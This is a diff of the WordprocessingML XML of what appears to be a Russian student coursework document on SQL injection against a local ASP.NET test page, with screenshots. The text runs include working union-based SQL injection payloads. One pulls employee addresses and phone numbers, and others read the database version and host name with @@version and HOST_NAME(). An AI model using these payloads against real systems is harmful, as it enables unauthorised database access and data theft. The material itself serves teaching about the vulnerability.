+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + Address + '  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + Cast(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>varchar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(50),</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HomePhone</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)' , ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, 1 from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Employes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2819566" cy="2931619"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="Рисунок 11" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 11" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2819491" cy="2931541"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2676442" cy="2753242"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="12" name="Рисунок 12" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 12" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2676587" cy="2753391"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Узнать имя текущего хоста и версию базы данных можно следующим запросом:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>%') and '1' = '2' union select 1, @@version, HOST_NAME(), 1 --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>1'  and '1' = '2' union select 1, @@version, HOST_NAME(), 1 --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2839786" cy="2456953"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="13" name="Рисунок 13" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 13" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2841595" cy="2458518"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="a"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:snapToGrid w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:w w:val="0"/>
+          <w:sz w:val="0"/>
+          <w:szCs w:val="0"/>
+          <w:u w:color="000000"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="000000"/>
+          <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
+          <w:lang/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="2922933" cy="2516539"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="14" name="Рисунок 14" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 14" descr="C:\Users\Сергей\Desktop\Скрины для курсововй\localhost25244Default.aspx - Google Chrome.jpg"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18" cstate="print"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2928119" cy="2521004"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -30569,6 +33350,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="1F6112CF"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9884A0FC"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="27A471E7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="DFA68468"/>
@@ -30654,7 +33521,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="2A8C7A74"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0BB2028A"/>
@@ -30740,7 +33607,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="2BF92DAC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C39495EA"/>
@@ -30826,7 +33693,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7">
+  <w:abstractNum w:abstractNumId="8">
     <w:nsid w:val="2E595B10"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7AB84CA6"/>
@@ -30912,7 +33779,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8">
+  <w:abstractNum w:abstractNumId="9">
     <w:nsid w:val="313A2873"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="21285D46"/>
@@ -30998,7 +33865,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9">
+  <w:abstractNum w:abstractNumId="10">
+    <w:nsid w:val="35A652E7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="66204992"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
